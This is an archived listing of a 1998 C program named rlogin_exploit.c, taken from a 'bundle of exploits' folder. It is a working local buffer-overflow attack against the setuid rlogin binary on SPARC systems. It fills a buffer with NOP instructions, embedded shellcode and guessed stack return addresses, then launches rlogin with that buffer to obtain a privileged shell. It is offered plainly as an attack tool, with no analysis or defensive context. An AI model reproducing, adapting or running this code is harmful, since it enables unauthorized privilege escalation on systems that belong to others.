home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / rlogin_exploit.c < prev    next >
C/C++ Source or Header  |  1998-07-17  |  1KB  |  53 lines
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <sys/types.h>
  4. #include <unistd.h>
  5.  
  6. #define BUF_LENGTH      8200
  7. #define EXTRA           100
  8. #define STACK_OFFSET    4000
  9. #define SPARC_NOP       0xa61cc013
  10.  
  11. u_char sparc_shellcode[] =
  12. "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  13. "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  14. "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  15. "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  16. "\x82\x10\x20\x3b\x91\xd4\xff\xff";
  17.  
  18. u_long get_sp(void)
  19. {
  20.   __asm__("mov %sp,%i0 \n");
  21. }
  22.  
  23. void main(int argc, char *argv[])
  24. {
  25.   char buf[BUF_LENGTH + EXTRA];
  26.   long targ_addr;
  27.   u_long *long_p;
  28.   u_char *char_p;
  29.   int i, code_length = strlen(sparc_shellcode);
  30.  
  31.   long_p = (u_long *) buf;
  32.  
  33.   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  34.     *long_p++ = SPARC_NOP;
  35.  
  36.   char_p = (u_char *) long_p;
  37.  
  38.   for (i = 0; i < code_length; i++)
  39.     *char_p++ = sparc_shellcode[i];
  40.  
  41.   long_p = (u_long *) char_p;
  42.  
  43.   targ_addr = get_sp() - STACK_OFFSET;
  44.   for (i = 0; i < EXTRA / sizeof(u_long); i++)
  45.     *long_p++ = targ_addr;
  46.  
  47.   printf("Jumping to address 0x%lx\n", targ_addr);
  48.  
  49.   execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  50.   perror("execl failed");
  51. }
  52.  
  53.